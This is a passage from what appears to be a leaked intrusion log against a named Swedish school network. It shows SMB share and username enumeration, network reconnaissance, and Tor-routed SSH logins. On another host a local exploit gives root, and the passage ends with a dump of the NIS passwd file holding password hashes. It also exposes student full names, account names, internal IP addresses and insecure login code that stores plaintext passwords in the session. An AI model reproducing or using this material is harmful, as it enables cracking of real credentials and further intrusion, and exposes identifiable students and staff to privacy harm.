  897. NT_STATUS_ACCESS_DENIED listing \*
  898.  
  899. 38400 blocks of size 4096. 38400 blocks available
  900. smb: \> pwd
  901. Current directory is \\munin\fs05guca$\
  902. smb: \> cd ..
  903. smb: \> dir
  904. NT_STATUS_ACCESS_DENIED listing \*
  905.  
  906. 38400 blocks of size 4096. 38400 blocks available
  907. smb: \> cd ..
  908. smb: \> dir
  909. NT_STATUS_ACCESS_DENIED listing \*
  910.  
  911. 38400 blocks of size 4096. 38400 blocks available
  912. smb: \>
  913. fs03sani@oden /tmp $
  914.  
  915. #
  916. # lite b�ttre lista p� users ;) :=D:)D:
  917. #
  918.  
  919. fs03sani@oden /tmp $ smbclient -L munin
  920. Password:
  921. Anonymous login successful
  922. Domain=[FS] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
  923.  
  924. Sharename Type Comment
  925. --------- ---- -------
  926. larsb$ Disk
  927. fs03mawa$ Disk
  928. fs03jowe$ Disk
  929. fs03erag$ Disk
  930. fs03laga$ Disk
  931. fs04rogu$ Disk
  932. fs04jijo$ Disk
  933. Charlotta Printer Charlotta
  934. fs05alka$ Disk
  935. fs05mali$ Disk
  936. fs05roli$ Disk
  937. bol$ Disk
  938. MUNIN.log Disk "Exchange message tracking logs"
  939. fs03rosj$ Disk
  940. fs03milu$ Disk
  941. fs03vipo$ Disk
  942. fs04adkn$ Disk
  943. fs04sasj$ Disk
  944. fs04angu$ Disk
  945. fs04joka$ Disk
  946. fs04frli$ Disk
  947. fs04osro$ Disk
  948. fs04mosh$ Disk
  949. fs03rafo$ Disk
  950. fs05tosu$ Disk
  951. petter$ Disk
  952. fs03mira$ Disk
  953. fs03chwa$ Disk
  954. fs04otke$ Disk
  955. fs04anul$ Disk
  956. fs03kini$ Disk
  957. fs05chba$ Disk
  958. fs05ligo$ Disk
  959. fs05pehi$ Disk
  960. fs05frwa$ Disk
  961. fs05amer$ Disk
  962. IPC$ IPC Remote IPC
  963. D$ Disk Default share
  964. print$ Disk Printer Drivers
  965. madis$ Disk
  966. fs03ango$ Disk
  967. fs03jofl$ Disk
  968. fs03anmo$ Disk
  969. fs03sani$ Disk
  970. fs03peah$ Disk
  971. fs04magu$ Disk
  972. fs04cosj$ Disk
  973. fs04heve$ Disk
  974. fs04chol$ Disk
  975. fs04erwi$ Disk
  976. fs04mazo$ Disk
  977. fs05jobe$ Disk
  978. fs05migu$ Disk
  979. fs05emsv$ Disk
  980. fs05mawe$ Disk
  981. fs05pasa$ Disk
  982. fs05toto$ Disk
  983. testims$ Disk
  984. carlos$ Disk
  985. Resources$ Disk "Event logging files"
  986. asjoli$ Disk
  987. fs03mino$ Disk
  988. fs03guro$ Disk
  989. fs03lisu$ Disk
  990. fs04jiad$ Disk
  991. fs04than$ Disk
  992. fs04osbl$ Disk
  993. fs04chja$ Disk
  994. fs04pebl$ Disk
  995. fs04kati$ Disk
  996. fs05frar$ Disk
  997. fs05pajo$ Disk
  998. fs05alli$ Disk
  999. fs05anso$ Disk
  1000. leif$ Disk
  1001. olle$ Disk
  1002. fs03lier$ Disk
  1003. fs03mafo$ Disk
  1004. fs03ansj$ Disk
  1005. fs03erjo$ Disk
  1006. fs03gaak$ Disk
  1007. fs03kaak$ Disk
  1008. NETLOGON Disk Logon server share
  1009. fs04dape$ Disk
  1010. fs04olde$ Disk
  1011. kansli Printer kansli
  1012. fs05jian$ Disk
  1013. fs05guca$ Disk
  1014. fs05sajo$ Disk
  1015. fs05erka$ Disk
  1016. fs05jola$ Disk
  1017. fs05jili$ Disk
  1018. fs05joak$ Disk
  1019. fs05kali$ Disk
  1020. fs05visa$ Disk
  1021. Gemensam Disk
  1022. fs03johe$ Disk
  1023. fs03emol$ Disk
  1024. fs03maha$ Disk
  1025. fs04lihe$ Disk
  1026. fs04elka$ Disk
  1027. fs04tape$ Disk
  1028. fs05gued$ Disk
  1029. fs05anwi$ Disk
  1030. fs05elra$ Disk
  1031. fs03soha$ Disk
  1032. fs03mano$ Disk
  1033. fs03mape$ Disk
  1034. fs03hevi$ Disk
  1035. rs Disk
  1036. fs04boge$ Disk
  1037. fs04elre$ Disk
  1038. fs04sofr$ Disk
  1039. fs04jegi$ Disk
  1040. fs04odsv$ Disk
  1041. fs05kasv$ Disk
  1042. fs05sevi$ Disk
  1043. kansli$ Disk
  1044. fs03anho$ Disk
  1045. fs04peto$ Disk
  1046. fs04lipe$ Disk
  1047. fs05eman$ Disk
  1048. fs05saan$ Disk
  1049. fs05cefe$ Disk
  1050. fs05anod$ Disk
  1051. fja$ Disk
  1052. christer$ Disk
  1053. fs03frwi$ Disk
  1054. fs03uljo$ Disk
  1055. fs04dace$ Disk
  1056. kansli2 Printer kansli2
  1057. fs05emhe$ Disk
  1058. csm$ Disk
  1059. anna$ Disk
  1060. fs03alci$ Disk
  1061. fs03emer$ Disk
  1062. fs03hepe$ Disk
  1063. fs04vila$ Disk
  1064. fs04hemo$ Disk
  1065. fs04josv$ Disk
  1066. fs04peba$ Disk
  1067. fs04saol$ Disk
  1068. fs03vias$ Disk
  1069. fs05algu$ Disk
  1070. fs05erha$ Disk
  1071. fs05clre$ Disk
  1072. fs05mimo$ Disk
  1073. fs05saod$ Disk
  1074. kgn$ Disk
  1075. sven$ Disk
  1076. fs03emme$ Disk
  1077. fs03jose$ Disk
  1078. fs03pewa$ Disk
  1079. kristoffer$ Disk
  1080. fs03omaz$ Disk
  1081. fs04emek$ Disk
  1082. fs04pegr$ Disk
  1083. fs04ulse$ Disk
  1084. fs04joel$ Disk
  1085. fs04mahe$ Disk
  1086. fs04peru$ Disk
  1087. sal3$ Disk
  1088. fs05sice$ Disk
  1089. fs05frol$ Disk
  1090. fs05jewa$ Disk
  1091. fs05jomi$ Disk
  1092. fs05nimo$ Disk
  1093. fs03daho$ Disk
  1094. fs03olpe$ Disk
  1095. fs03elbj$ Disk
  1096. fs03bjer$ Disk
  1097. fs04jofa$ Disk
  1098. fs04huhe$ Disk
  1099. fs04liwe$ Disk
  1100. fs04vida$ Disk
  1101. fs05nied$ Disk
  1102. fs05tigu$ Disk
  1103. fs05camo$ Disk
  1104. fs05olli$ Disk
  1105. ADMIN$ Disk Remote Admin
  1106. ingemar$ Disk
  1107. hd Disk
  1108. fs03mafr$ Disk
  1109. fs03hamo$ Disk
  1110. fs03rosa$ Disk
  1111. fs03jows$ Disk
  1112. fs03emah$ Disk
  1113. fs03jeha$ Disk
  1114. SYSVOL Disk Logon server share
  1115. fs04jevi$ Disk
  1116. fs05soas$ Disk
  1117. fs05evbr$ Disk
  1118. fs05phfr$ Disk
  1119. fs05erti$ Disk
  1120. fs05mili$ Disk
  1121. C$ Disk Default share
  1122. britt$ Disk
  1123. asa$ Disk
  1124. fs03mary$ Disk
  1125. fs03anro$ Disk
  1126. fs04sugu$ Disk
  1127. fs04jeol$ Disk
  1128. fs04hang$ Disk
  1129. fs05jobj$ Disk
  1130. fs05anwa$ Disk
  1131. fs05lien$ Disk
  1132. fs05daer$ Disk
  1133. fs05mahe$ Disk
  1134. bpo$ Disk
  1135. erik$ Disk
  1136. Address Disk "Access to address objects"
  1137. fs03fran$ Disk
  1138. fs03cesa$ Disk
  1139. kalle$ Disk
  1140. fs04jeka$ Disk
  1141. fs04alnd$ Disk
  1142. fs04clre$ Disk
  1143. fs04hasu$ Disk
  1144. fs04dejo$ Disk
  1145. fs04adla$ Disk
  1146. fs04lisa$ Disk
  1147. fs03yakh$ Disk
  1148. fs05sika$ Disk
  1149. fs05ankj$ Disk
  1150. fs05daag$ Disk
  1151. fs05emsa$ Disk
  1152. fs05ermy$ Disk
  1153. fs05lara$ Disk
  1154. fs05masv$ Disk
  1155. fs05ossa$ Disk
  1156. rsp$ Disk
  1157. fs03robe$ Disk
  1158. fs03olsa$ Disk
  1159. fs03mave$ Disk
  1160. fs03alsv$ Disk
  1161. fs04empa$ Disk
  1162. fs04habe$ Disk
  1163. fs03mabj$ Disk
  1164. Biblo Printer Biblo
  1165. fs05lobe$ Disk
  1166. fs05peef$ Disk
  1167. fs05anek$ Disk
  1168. fs05mais$ Disk
  1169. fs05erro$ Disk
  1170. Anonymous login successful
  1171. Domain=[FS] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
  1172.  
  1173. Server Comment
  1174. --------- -------
  1175. HUGIN
  1176. MUNIN
  1177.  
  1178. Workgroup Master
  1179. --------- -------
  1180. FS MUNIN
  1181.  
  1182. fs03sani@oden /tmp $ cat /etc/yp.conf
  1183.  
  1184. # /etc/yp.conf - ypbind configuration file
  1185. # Valid entries are
  1186. #
  1187. domain forsmark.uu.se server munin.forsmark.uu.se
  1188. # Use server HOSTNAME for the domain NISDOMAIN.
  1189. #
  1190. #domain NISDOMAIN broadcast
  1191. # Use broadcast on the local net for domain NISDOMAIN
  1192. #
  1193. #ypserver munin.forsmark.uu.se
  1194. # Use server HOSTNAME for the local domain. The
  1195. # IP-address of server must be listed in /etc/hosts.
  1196. #
  1197. fs03sani@oden /tmp $ cat /proc/cpuinfo
  1198. processor : 0
  1199. vendor_id : GenuineIntel
  1200. cpu family : 15
  1201. model : 2
  1202. model name : Intel(R) Xeon(TM) CPU 2.40GHz
  1203. stepping : 7
  1204. cpu MHz : 2400.262
  1205. cache size : 512 KB
  1206. physical id : 0
  1207. siblings : 2
  1208. fdiv_bug : no
  1209. hlt_bug : no
  1210. f00f_bug : no
  1211. coma_bug : no
  1212. fpu : yes
  1213. fpu_exception : yes
  1214. cpuid level : 2
  1215. wp : yes
  1216. flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse
  1217. sse2 ss ht tm pbe cid
  1218. bogomips : 4734.97
  1219.  
  1220. processor : 1
  1221. vendor_id : GenuineIntel
  1222. cpu family : 15
  1223. model : 2
  1224. model name : Intel(R) Xeon(TM) CPU 2.40GHz
  1225. stepping : 7
  1226. cpu MHz : 2400.262
  1227. cache size : 512 KB
  1228. physical id : 0
  1229. siblings : 2
  1230. fdiv_bug : no
  1231. hlt_bug : no
  1232. f00f_bug : no
  1233. coma_bug : no
  1234. fpu : yes
  1235. fpu_exception : yes
  1236. cpuid level : 2
  1237. wp : yes
  1238. flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse
  1239. sse2 ss ht tm pbe cid
  1240. bogomips : 4784.12
  1241.  
  1242. processor : 2
  1243. vendor_id : GenuineIntel
  1244. cpu family : 15
  1245. model : 2
  1246. model name : Intel(R) Xeon(TM) CPU 2.40GHz
  1247. stepping : 7
  1248. cpu MHz : 2400.262
  1249. cache size : 512 KB
  1250. physical id : 3
  1251. siblings : 2
  1252. fdiv_bug : no
  1253. hlt_bug : no
  1254. f00f_bug : no
  1255. coma_bug : no
  1256. fpu : yes
  1257. fpu_exception : yes
  1258. cpuid level : 2
  1259. wp : yes
  1260. flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse
  1261. sse2 ss ht tm pbe cid
  1262. bogomips : 4784.12
  1263.  
  1264. processor : 3
  1265. vendor_id : GenuineIntel
  1266. cpu family : 15
  1267. model : 2
  1268. model name : Intel(R) Xeon(TM) CPU 2.40GHz
  1269. stepping : 7
  1270. cpu MHz : 2400.262
  1271. cache size : 512 KB
  1272. physical id : 3
  1273. siblings : 2
  1274. fdiv_bug : no
  1275. hlt_bug : no
  1276. f00f_bug : no
  1277. coma_bug : no
  1278. fpu : yes
  1279. fpu_exception : yes
  1280. cpuid level : 2
  1281. wp : yes
  1282. flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse
  1283. sse2 ss ht tm pbe cid
  1284. bogomips : 4784.12
  1285.  
  1286. fs03sani@oden /tmp $ cat /proc/cpuinfo|grep 24|wc -l
  1287. 4
  1288. fs03sani@oden ~ $ cat /etc/hosts
  1289. 127.0.0.1 localhost
  1290. 192.168.1.20 oden oden.forsmark.uu.se
  1291. 192.168.1.11 www www.forsmark.uu.se www.forsmarksskola.se
  1292. 192.168.1.13 www2 www2.forsmark.uu.se
  1293. 192.168.1.14 ida ida.forsmark.uu.se
  1294. 192.168.1.10 munin munin.forsmark.uu.se
  1295. 192.168.1.21 hugin hugin.forsmark.uu.se
  1296. 192.168.1.22 ask ask.forsmark.uu.se
  1297. 192.168.1.23 embla embla.forsmark.uu.se
  1298. 192.168.1.24 tor tor.forsmark.uu.se
  1299. 10.28.5.1 greger greger.fbin.org
  1300. 192.168.1.95 ltsp02.forsmark.uu.se
  1301. 192.168.1.97 ltsp01.forsmark.uu.se
  1302.  
  1303. fs03sani@oden ~ $ /sbin/arp -a
  1304. ? (192.168.1.151) at 00:30:05:0F:18:90 [ether] on eth0
  1305. ? (192.168.1.150) at 00:30:05:0F:19:35 [ether] on eth0
  1306. ? (192.168.1.183) at 00:30:05:0F:18:86 [ether] on eth0
  1307. lina.forsmark.uu.se (192.168.1.1) at 00:A0:24:F2:5A:5B [ether] on eth0
  1308. ? (192.168.1.146) at 00:30:05:20:A1:76 [ether] on eth0
  1309. ? (192.168.1.182) at 00:30:05:20:E2:3D [ether] on eth0
  1310. ? (192.168.1.145) at 00:30:05:20:E1:15 [ether] on eth0
  1311. ? (192.168.1.181) at 00:30:05:20:E1:2C [ether] on eth0
  1312. ? (192.168.1.180) at 00:30:05:0F:18:82 [ether] on eth0
  1313. ? (192.168.1.144) at 00:30:05:20:E2:3B [ether] on eth0
  1314. ida (192.168.1.14) at 08:00:20:86:E7:3F [ether] on eth0
  1315. ? (192.168.1.184) at 00:30:05:20:A1:75 [ether] on eth0
  1316. ? (192.168.1.157) at 00:30:05:0F:19:59 [ether] on eth0
  1317. ? (192.168.1.185) at 00:30:05:20:A4:3C [ether] on eth0
  1318. ? (192.168.1.154) at 00:30:05:0F:18:54 [ether] on eth0
  1319. ? (192.168.1.155) at 00:30:05:20:E2:0E [ether] on eth0
  1320. ? (192.168.1.191) at 00:30:05:20:A4:79 [ether] on eth0
  1321. munin (192.168.1.10) at 08:00:06:2B:31:44 [ether] on eth0
  1322. www (192.168.1.11) at 00:90:27:41:30:E5 [ether] on eth0
  1323. ? (192.168.1.132) at 00:30:05:20:A1:74 [ether] on eth0
  1324. ? (192.168.1.134) at 00:30:05:20:E2:37 [ether] on eth0
  1325. ? (192.168.1.165) at <incomplete> on eth0
  1326. ? (192.168.1.129) at 00:30:05:20:E1:2B [ether] on eth0
  1327. ? (192.168.1.128) at 00:30:05:0F:18:B8 [ether] on eth0
  1328. ? (192.168.1.131) at 00:30:05:0F:19:37 [ether] on eth0
  1329. ? (192.168.1.130) at 00:30:05:20:E2:02 [ether] on eth0
  1330. ? (192.168.1.140) at 00:30:05:0F:19:36 [ether] on eth0
  1331. ? (192.168.1.197) at 00:30:05:20:A1:62 [ether] on eth0
  1332. ? (192.168.1.141) at <incomplete> on eth0
  1333. ? (192.168.1.170) at 00:30:05:20:E2:05 [ether] on eth0
  1334. ? (192.168.1.142) at <incomplete> on eth0
  1335. ? (192.168.1.143) at 00:30:05:0F:14:01 [ether] on eth0
  1336. ? (192.168.1.136) at 00:30:05:20:E2:2B [ether] on eth0
  1337. ? (192.168.1.137) at 00:30:05:0F:14:03 [ether] on eth0
  1338. ? (192.168.1.192) at 00:30:05:20:E2:0A [ether] on eth0
  1339. ? (192.168.1.138) at 00:30:05:20:A1:79 [ether] on eth0
  1340. ? (192.168.1.139) at 00:30:05:0F:19:5E [ether] on eth0
  1341.  
  1342. fs03sani@oden ~ $ id
  1343. uid=15013(fs03sani) gid=10000(elever) groups=10000(elever)
  1344.  
  1345.  
  1346. 14:22 <@Robin> vi kan ju kolla igenom era larviga loginnamn :)
  1347. 14:23 <@Robin> �ven fs04peru men inte fs04chile
  1348. 14:23 <@Robin> samt fs05toto men inte fs05dorothy
  1349. 14:24 < Luxh> kan man byta loginnamn?
  1350. 14:24 <@Robin> nej
  1351. 14:25 <@Robin> eller kan kan man men det t�nkter vi inte g�ra �t er
  1352.  
  1353. lynx --dump http://www.forsmark.uu.se/galleri/f3n/comments|sed 's/.jpg/ /g'|awk '{print $1}'
  1354.  
  1355. > torify ssh www.forsmark.uu.se -l fs03sani
  1356. Password:
  1357. Last login: Fri Sep 23 10:11:31 from 192.168.1.182
  1358.  
  1359. V�lkommen till oden.forsmark.uu.se
  1360.  
  1361. fs03sani@oden ~ $ uname -a
  1362. Linux oden 2.6.4-gentoo #1 SMP Sat Apr 3 18:44:37 CEST 2004 i686 Intel(R) Xeon(TM)
  1363. CPU 2.40GHz GenuineIntel GNU/Linux
  1364.  
  1365.  
  1366.  
  1367.  
  1368.  
  1369. http://www.forsmark.uu.se/galleri/f3n/comments
  1370.  
  1371.  
  1372. fs03alci.jpg Aleks Ciparsons
  1373. fs03ango.jpg Anders Goransson
  1374. fs03anhg.jpg Anna Hogberg
  1375. fs03ansj.jpg Angelica Sjodin
  1376. fs03chwa.jpg Christian Waller
  1377. fs03daho.jpg Daniel Holst
  1378. fs03emer.jpg Emil Eriksson
  1379. fs03frwi.jpg Fredrik Wigert
  1380. fs03guro.jpg Gustav Robertsson
  1381. fs03hamo.jpg Hampus Moller
  1382. fs03jows.jpg Jonas Westin
  1383. fs03kaak.jpg Kadir Akhan
  1384. fs03mafo.jpg Magnus Forslund
  1385. fs03mafr.jpg Martin Frisk
  1386. fs03mave.jpg Martin Vestling
  1387. fs03mawa.jpg Marta Wahnstrom
  1388. fs03mino.jpg Mikaela Nordstrom
  1389. fs03mira.jpg Mikael Rapp
  1390. fs03olpe.jpg Olov Petersson
  1391. fs03olsa.jpg Olle Samuelsson
  1392. fs03robe.jpg Robin Bergman
  1393. fs03rosa.jpg Roger Sandberg
  1394. fs03rosj.jpg Robin Sjogren
  1395. fs03soha.jpg Sofie Hagervik
  1396.  
  1397. lynx --dump http://www.forsmark.uu.se/galleri/f3n/comments|sed 's/.jpg/ /g'|awk '{print $1}' > user.txt <-- ger oss lista p� usernames
  1398.  
  1399.  
  1400.  
  1401.  
  1402. <? session_start();
  1403. include_once("checkuser.php");
  1404. include_once("db.php");
  1405. include_once("names.php");
  1406.  
  1407. if ($HTTP_POST_VARS[passwd] == "") {
  1408. $ses_user = $HTTP_SESSION_VARS["ses_user"] = NULL;
  1409. session_register("ses_user");
  1410. print_error("Du m&aring;ste ange ett l&ouml;senord");
  1411. exit();
  1412. }
  1413.  
  1414. echo "<font color=white>";
  1415. $match = yp_match(yp_get_default_domain(), "passwd.byname", $HTTP_POST_VARS[user]);
  1416. echo "</font>";
  1417.  
  1418. $fields = explode(":", $match);
  1419. $nispasswd = $fields[1];
  1420.  
  1421. // Inga rader, anv�ndaren finns inte i databasen.
  1422. if (crypt($HTTP_POST_VARS[passwd], $nispasswd) == $nispasswd) {
  1423. $ses_user = $HTTP_SESSION_VARS["ses_user"] = $HTTP_POST_VARS[user];
  1424. if( $HTTP_POST_VARS[user] == "fja" ){
  1425. $ses_admin = $HTTP_SESSION_VARS["ses_admin"] = 1;
  1426. }
  1427. else {
  1428. $ses_admin = $HTTP_SESSION_VARS["ses_admin"] = 0;
  1429. }
  1430. $ses_user = $HTTP_SESSION_VARS["user"] ;
  1431. $ses_elev = $HTTP_SESSION_VARS["ses_elev"] = 1;
  1432. $ses_larare = $HTTP_SESSION_VARS["ses_larare"] = 0;
  1433. $ses_passwd = $HTTP_SESSION_VARS["ses_passwd"] = $HTTP_POST_VARS["passwd"];
  1434. session_register("ses_admin");
  1435. session_register("ses_user");
  1436. session_register("ses_elev");
  1437. session_register("ses_larare");
  1438. session_register("ses_passwd");
  1439. include("logged_in.php");
  1440. } else {
  1441. $ses_user = $HTTP_SESSION_VARS["ses_user"] = NULL;
  1442. session_register("ses_user");
  1443. print_error("Av�ndaren finns inte");
  1444. }
  1445.  
  1446. function print_error($mesg)
  1447. {
  1448. ?>
  1449.  
  1450. <html>
  1451. <head>
  1452. <link rel="stylesheet" href="/stil.css" type="text/css">
  1453. </head>
  1454. <body>
  1455.  
  1456. <br><br><br><br>
  1457.  
  1458. </body>
  1459. </html>
  1460. <?
  1461. }
  1462. ?>
  1463.  
  1464. <script language="javascript">
  1465. <!--
  1466. parent.frames["bottom"].location = parent.frames["bottom"].location;
  1467. //-->
  1468. </script>
  1469.  
  1470.  
  1471.  
  1472.  
  1473.  
  1474. www.forsmark.uu.se
  1475. oden.forsmark.uu.se
  1476.  
  1477.  
  1478. fs03sani@oden ~/public_html/slask $ wc -l backup.sql
  1479. 75689 backup.sql
  1480.  
  1481. fs03sani@oden ~/public_html/slask $ ssh -T tor -l sal3
  1482. The authenticity of host 'tor (192.168.1.24)' can't be established.
  1483. RSA key fingerprint is dc:62:02:b9:6e:87:91:fb:8b:06:bf:e9:28:2f:7a:cc.
  1484. Are you sure you want to continue connecting (yes/no)? yes
  1485. Warning: Permanently added 'tor,192.168.1.24' (RSA) to the list of known hosts.
  1486. sal3@tor's password:
  1487. id
  1488. uid=20001(sal3) gid=10000(elever) groups=10000(elever)
  1489.  
  1490. uname -a
  1491. uid=20001(sal3) gid=10000(elever) groups=10000(elever)
  1492. Linux tor 2.4.20-8smp #1 SMP Thu Mar 13 17:45:54 EST 2003 i686 i686 i386 GNU/Linux
  1493.  
  1494. cat /etc/redhat-release
  1495. Red Hat Linux release 9 (Shrike)
  1496.  
  1497. ./hat
  1498. id
  1499. uid=0(root) gid=0(root)
  1500.  
  1501. mount
  1502. /dev/hda7 on / type ext3 (rw)
  1503. none on /proc type proc (rw)
  1504. usbdevfs on /proc/bus/usb type usbdevfs (rw)
  1505. /dev/hda6 on /boot type ext3 (rw)
  1506. /dev/hda2 on /data type vfat (rw)
  1507. none on /dev/pts type devpts (rw,gid=5,mode=620)
  1508. none on /dev/shm type tmpfs (rw)
  1509. 192.168.1.20:/home on /home type nfs (rw,addr=192.168.1.20)
  1510.  
  1511. #
  1512. # /etc/pf.conf for OpenBSD 3.3
  1513. # "inspired" by pf.conf(5) and Han (http://www.xs4all.nl/~hanb/configs/)
  1514. #
  1515. # http://legonet.org/~griffin/openbsd/
  1516. #
  1517.  
  1518. #set limit { states 20000, frags 20000 }
  1519. set optimization aggressive
  1520.  
  1521. set block-policy return
  1522.  
  1523. set loginterface xl0
  1524.  
  1525. # interfaces
  1526. ext_if = "xl0"
  1527. int_if = "xl1"
  1528.  
  1529. # n�t som h�r till fbin/skolan
  1530. # anv�nds vid nat och $int_if-reglerna
  1531. fbin = "10.0.0.0/8"
  1532. skolan = "192.168.1.0/24"
  1533.  
  1534. # datorer det ska portforwardas till
  1535. #oden = "192.168.1.20"
  1536. #www = "192.168.1.11"
  1537. #munin = "192.168.1.10"
  1538. #webcam = "192.168.1.96"
  1539. #fbin_ircd = "10.0.100.17"
  1540.  
  1541. # tcp servers
  1542. #tcp_servers = "{ 21, 22, 25, 53, 80, 90, 6667 }"
  1543. #udp_servers = "{ 53 }"
  1544.  
  1545. TCP_OPTIONS = "flags S/SAFRUP keep state"
  1546.  
  1547. table <rfc1918> const { 192.168.0.0/16, 172.16.0.0/12, 10.0.0.0/8 }
  1548.  
  1549. # normalize all incoming traffic
  1550. #scrub on { $ext_if, $int_if } all fragment reassemble
  1551.  
  1552. # nat
  1553. nat on $ext_if inet from $fbin to any -> ($ext_if)
  1554. nat on $ext_if inet from $skolan to any -> ($ext_if)
  1555.  
  1556. # portforwarding
  1557. #rdr on $ext_if inet proto tcp from any to ($ext_if) port 20 -> $oden port 20
  1558. #rdr on $ext_if inet proto tcp from any to ($ext_if) port 21 -> $oden port 21
  1559. #rdr on $ext_if inet proto tcp from any to ($ext_if) port 22 -> $oden port 22
  1560.  
  1561. #rdr on $ext_if inet proto tcp from any to ($ext_if) port 25 -> $munin port 25
  1562. #rdr on $ext_if inet proto tcp from any to ($ext_if) port 110 -> $munin port 110
  1563. #rdr on $ext_if inet proto tcp from any to ($ext_if) port 143 -> $munin port 143
  1564.  
  1565. #rdr on $ext_if inet proto tcp from any to ($ext_if) port 80 -> $www port 80
  1566. #rdr on $ext_if inet proto tcp from any to ($ext_if) port 90 -> $webcam port 90
  1567.  
  1568. #rdr on $ext_if inet proto tcp from any to ($ext_if) port 6667 -> $fbin_ircd port 6667
  1569.  
  1570. #rdr on $ext_if inet proto tcp from any to ($ext_if) port 5000 -> 192.168.1.136 port 5000
  1571. #rdr on $ext_if inet proto tcp from any to ($ext_if) port 5001 -> 10.64.1.3 port 5001
  1572.  
  1573. # s� att jag (griffin) kan ssha direkt in till lina
  1574. #rdr on $ext_if inet proto tcp from 130.240.202.203/32 to ($ext_if) port 2222 -> 127.0.0.1 port 22
  1575.  
  1576. # f�r att f� active ftp att f0nkah
  1577. #rdr on $int_if proto tcp from any to any port 21 -> 127.0.0.1 port 8021
  1578.  
  1579. # default deny
  1580. block on { $ext_if, $int_if } all
  1581.  
  1582. # "In lo0 we trust."
  1583. pass quick on lo0 all
  1584.  
  1585. # antispoof
  1586. antispoof for { lo0, $ext_if, $int_if } inet
  1587.  
  1588. # block outgoing packets that don't have our source address
  1589. #block out log quick on $ext_if inet from ! ($ext_if) to any
  1590. block out quick on $ext_if inet from ! ($ext_if) to any
  1591.  
  1592. # block in from rfc1918
  1593. block drop in log quick on $ext_if from <rfc1918> to any
  1594.  
  1595.  
  1596. # ICMP
  1597.  
  1598. # pass out/in certain ICMP queries and keep state (ping)
  1599. pass on $ext_if inet proto icmp all icmp-type 8 code 0 keep state
  1600.  
  1601.  
  1602. # UDP
  1603.  
  1604. # pass out all UDP connections and keep state
  1605. pass out on $ext_if proto udp all keep state
  1606.  
  1607. # pass in certain UDP connections and keep state (DNS)
  1608. #pass in on $ext_if proto udp from any to any port $udp_servers keep state
  1609.  
  1610.  
  1611. # TCP
  1612.  
  1613. # pass out all TCP connections and modulate state
  1614. pass out on $ext_if proto tcp all flags S/SAFRUP modulate state
  1615.  
  1616. # pass in certain TCP connections and keep state
  1617. #pass in on $ext_if proto tcp from any to any port $tcp_servers $TCP_OPTIONS
  1618.  
  1619. # pass in data mode connections for ftp-proxy running on this host.
  1620. pass in on $ext_if inet proto tcp from any to ($ext_if) user proxy $TCP_OPTIONS
  1621.  
  1622.  
  1623. # Internal NIC
  1624. # sl�pp bara in/ut ip-nummer som h�r till fbin och skolan,
  1625. # s� sl�pper vi inte ut DoS-sakerna p� n�tet.
  1626. block drop on $int_if all
  1627. pass in on $int_if from { $fbin, $skolan } to any
  1628. pass out on $int_if from any to { $fbin, $skolan }
  1629.  
  1630.  
  1631.  
  1632. ypcat passwd
  1633. forsmark_u_root:x:0:1:Operator:/root:/bin/bash
  1634. britt:pLevpacW0l4QU:112:12000::/home/britt:/bin/sh
  1635. bol:ABCD!efgh12345$67890:117:12000::/home/bol:/bin/sh
  1636. fja:bEzPJftbqqFNE:497:12000::/home/fja:/bin/sh
  1637. larsb:kl.XKs3tLG/pM:502:12000::/home/larsb:/bin/sh
  1638. bpo:GKn41EVz5xx2g:933:12000::/home/bpo:/bin/sh
  1639. madis:fQQkOuKthNcrA:1000:10000::/home/madis:/bin/sh
  1640. olle:ShN1Acyh8r94A:1002:12000::/home/olle:/bin/sh
  1641. carlos:t3lEgt46M.C.2:1122:12000::/home/carlos:/bin/sh
  1642. petter:/7K6xY9xFKmIw:1357:12000::/home/petter:/bin/sh
  1643. fs04ulse:XeuT0tTZgb5X.:1623:10000::/home/fs04ulse:/bin/sh
  1644. csm:RKsIuhZgkhktg:2000:12000::/home/csm:/bin/sh
  1645. kansliet:nyhJheN5x0n.2:2001:12000::/home/kansliet:/bin/sh
  1646. fs05jois:w3PZ6ZnEXkEOg:10000:10000::/home/fs05jois:/bin/sh
  1647. fs05josk:z3snwcdh37Wdo:10001:10000::/home/fs05josk:/bin/sh
  1648. fs05eman:jeUL.C4NVkjPI:12001:10000::/home/fs05eman:/bin/sh
  1649. fs05jian:JhKjDo1y.ji5g:12002:10000::/home/fs05jian:/bin/sh
  1650. fs05saan:F3v8gbgSzuyfg:12003:10000::/home/fs05saan:/bin/sh
  1651. fs05frar:C47z9JRPzpgUs:12004:10000::/home/fs05frar:/bin/sh
  1652. fs05soas:xmljDvMUXBIOg:12005:10000::/home/fs05soas:/bin/sh
  1653. fs05chba:U.e5HcNkAKQiQ:12006:10000::/home/fs05chba:/bin/sh
  1654. fs05jobe:oveVnKW.EqLxI:12007:10000::/home/fs05jobe:/bin/sh
  1655. fs05lobe:TKaYFNFu.Xe9g:12008:10000::/home/fs05lobe:/bin/sh
  1656. fs05jobj:89nSzkxysgn/c:12009:10000::/home/fs05jobj:/bin/sh
  1657. fs05evbr:dfQfmQCoDXT9E:12010:10000::/home/fs05evbr:/bin/sh
  1658. fs05guca:VFxRU.EPRH1vk:12011:10000::/home/fs05guca:/bin/sh
  1659. fs05sice:RARVMAJoj7bjU:12012:10000::/home/fs05sice:/bin/sh
  1660. fs05anwa:XbVNkfdnaNyAY:12013:10000::/home/fs05anwa:/bin/sh
  1661. fs05nied:/Wikys4AedWho:12014:10000::/home/fs05nied:/bin/sh
  1662. fs05gued:Qn70cW1sj306c:12015:10000::/home/fs05gued:/bin/sh
  1663. fs05peef:A5qArtBPqMUhA:12016:10000::/home/fs05peef:/bin/sh
  1664. fs05anek:DtWQvaZqY0TPo:12017:10000::/home/fs05anek:/bin/sh
  1665. fs05lien:69U93HDudwEHw:12018:10000::/home/fs05lien:/bin/sh
  1666. fs05daer:YF0iqU87bTKQ6:12019:10000::/home/fs05daer:/bin/sh
  1667. fs05cefe:nWJYKA1DlcgNw:12020:10000::/home/fs05cefe:/bin/sh
  1668. fs05phfr:SmWCweE7DkwIM:12021:10000::/home/fs05phfr:/bin/sh
